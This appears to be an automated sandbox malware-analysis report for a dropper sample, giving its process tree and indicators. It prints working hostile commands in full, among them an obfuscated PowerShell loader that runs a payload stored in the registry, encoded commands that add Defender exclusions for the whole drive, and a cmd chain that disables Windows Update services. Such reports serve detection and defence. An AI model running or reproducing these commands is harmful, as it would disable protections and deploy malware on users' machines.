Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeConhost.exeConhost.exepid process 2800 MicrosoftEdge.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 4824 Conhost.exe 5336 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exeMicrosoftEdgeCP.exeMouseAtHome.exedescription pid process target process PID 3596 wrote to memory of 4676 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe namdoitntn.exe PID 3596 wrote to memory of 4676 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe namdoitntn.exe PID 3596 wrote to memory of 4676 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe namdoitntn.exe PID 3596 wrote to memory of 4688 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe real.exe PID 3596 wrote to memory of 4688 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe real.exe PID 3596 wrote to memory of 4688 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe real.exe PID 3596 wrote to memory of 4720 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe safert44.exe PID 3596 wrote to memory of 4720 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe safert44.exe PID 3596 wrote to memory of 4720 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe safert44.exe PID 3596 wrote to memory of 4768 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe kukurzka9000.exe PID 3596 wrote to memory of 4768 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe kukurzka9000.exe PID 3596 wrote to memory of 4768 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe kukurzka9000.exe PID 1336 wrote to memory of 1548 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1548 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1548 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1548 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3216 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to 
memory of 3216 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3216 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3216 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 3596 wrote to memory of 5008 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe F0geI.exe PID 3596 wrote to memory of 5008 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe F0geI.exe PID 3596 wrote to memory of 5008 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe F0geI.exe PID 3596 wrote to memory of 4196 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe tag.exe PID 3596 wrote to memory of 4196 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe tag.exe PID 3596 wrote to memory of 4196 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe tag.exe PID 1336 wrote to memory of 1332 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1332 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1332 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 1332 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 3596 wrote to memory of 4868 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe jshainx.exe PID 3596 wrote to memory of 4868 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe jshainx.exe PID 3596 wrote to memory of 4868 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe jshainx.exe PID 3596 wrote to memory of 4112 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe MouseAtHome.exe PID 3596 wrote to memory of 4112 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe MouseAtHome.exe PID 3596 wrote to memory of 4112 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe MouseAtHome.exe PID 1336 wrote to memory of 4220 1336 
MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4220 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4220 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4220 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3920 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3920 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3920 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 3920 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4492 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4492 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4492 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4492 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 3596 wrote to memory of 6068 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe EU1.exe PID 3596 wrote to memory of 6068 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe EU1.exe PID 3596 wrote to memory of 6068 3596 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe EU1.exe PID 1336 wrote to memory of 5064 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 5064 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 5064 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 5064 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4980 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4980 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4980 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 1336 wrote to memory of 4980 1336 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 4112 wrote to memory of 4832 4112 MouseAtHome.exe WindowsDefender.exe PID 4112 wrote to memory of 4832 4112 MouseAtHome.exe 
WindowsDefender.exe PID 4112 wrote to memory of 5220 4112 MouseAtHome.exe Windows.exe PID 4112 wrote to memory of 5220 4112 MouseAtHome.exe Windows.exe PID 4112 wrote to memory of 5220 4112 MouseAtHome.exe Windows.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f17f1ecd-6e21-4df7-a6f5-ec18b441dc1c}2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ed8471e8-e9c2-43da-b081-16793679315a}2⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ed8471e8-e9c2-43da-b081-16793679315a}2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHgAcwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABEAGUAZgBlAG4AZABlAHIAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwB4AG8AIwA+AA=="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Defender\updater.exe"C:\Program Files\Defender\updater.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Defender\updater.exe"4⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZQB2AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAaQB1AHUAIwA+AA=="
Decoded command (UTF-16LE): <#eu#> Add-MpPreference <#hevz#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#fc#> -Force <#wiuu#>
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe (depth 6)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe (depth 5)
Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\Conhost.exe (depth 6)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\sc.exe (depth 6)
Command line: sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 6)
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 6)
Command line: sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 6)
Command line: sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 6)
Command line: sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe (depth 6)
Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe (depth 6)
Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 6)
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe (depth 6)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 6)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 6)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 6)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 6)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 6)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 6)
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\cmd.exe (depth 5)
Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\Conhost.exe (depth 6)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\powercfg.exe (depth 6)
Command line: powercfg /x -hibernate-timeout-ac 0
-
C:\Windows\system32\powercfg.exe (depth 6)
Command line: powercfg /x -hibernate-timeout-dc 0
-
C:\Windows\system32\powercfg.exe (depth 6)
Command line: powercfg /x -standby-timeout-ac 0
-
C:\Windows\system32\powercfg.exe (depth 6)
Command line: powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\dialer.exe (depth 5)
Command line: C:\Windows\System32\dialer.exe "vktwbryast"
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe ipbedfnzjahdakqh1 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⤵
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservice -s nsi
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservice -s EventSystem
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s Themes
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
-
c:\windows\system32\sihost.exe (depth 2)
Command line: sihost.exe
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s SENS
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservice -s FontCache
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
-
C:\Windows\System32\spoolsv.exe (depth 1)
Command line: C:\Windows\System32\spoolsv.exe
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservice -s CDPSvc
-
C:\Windows\system32\DllHost.exe (depth 1)
Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
Command line: C:\Windows\system32\WerFault.exe -u -p 1912 -s 784
- Program crash
-
C:\Windows\system32\DllHost.exe (depth 1)
Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
Command line: C:\Windows\system32\WerFault.exe -u -p 3660 -s 1180
- Program crash
-
C:\Windows\system32\WerFault.exe (depth 2)
Command line: C:\Windows\system32\WerFault.exe -u -p 3660 -s 1160
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\Explorer.EXE (depth 1)
Command line: C:\Windows\Explorer.EXE
-
C:\Users\Admin\AppData\Local\Temp\598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe (depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe"
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe (depth 3)
Command line: "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\safert44.exe (depth 3)
Command line: "C:\Program Files (x86)\Company\NewProduct\safert44.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe (depth 3)
Command line: "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\real.exe (depth 3)
Command line: "C:\Program Files (x86)\Company\NewProduct\real.exe"
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exe (depth 4)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 1260
- Program crash
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exe (depth 3)
Command line: "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\tag.exe (depth 3)
Command line: "C:\Program Files (x86)\Company\NewProduct\tag.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exe (depth 3)
Command line: "C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe (depth 3)
Command line: "C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe (depth 4)
Command line: "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZgB0ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQQBsAGwAIAB2AGkAcgB1AHMAZQBzACAAaABhAHMAIABiAGUAZQBuACAAZABlAGwAZQB0AGUAZAAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdgBkAGUAIwA+AA=="
Decoded command (UTF-16LE): <#bft#>Add-Type -AssemblyName System.Windows.Forms;<#xca#>[System.Windows.Forms.MessageBox]::Show('All viruses has been deleted','','OK','Information')<#vde#>
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AbAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcQBoACMAPgA="
Decoded command (UTF-16LE): <#ghe#>Add-MpPreference <#wls#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#mlw#> -Force <#uqh#>
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Windows Defender.exe (depth 5)
Command line: "C:\Users\Admin\Windows Defender.exe"
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe (depth 6)
Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Windows Defender.exe"
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 7)
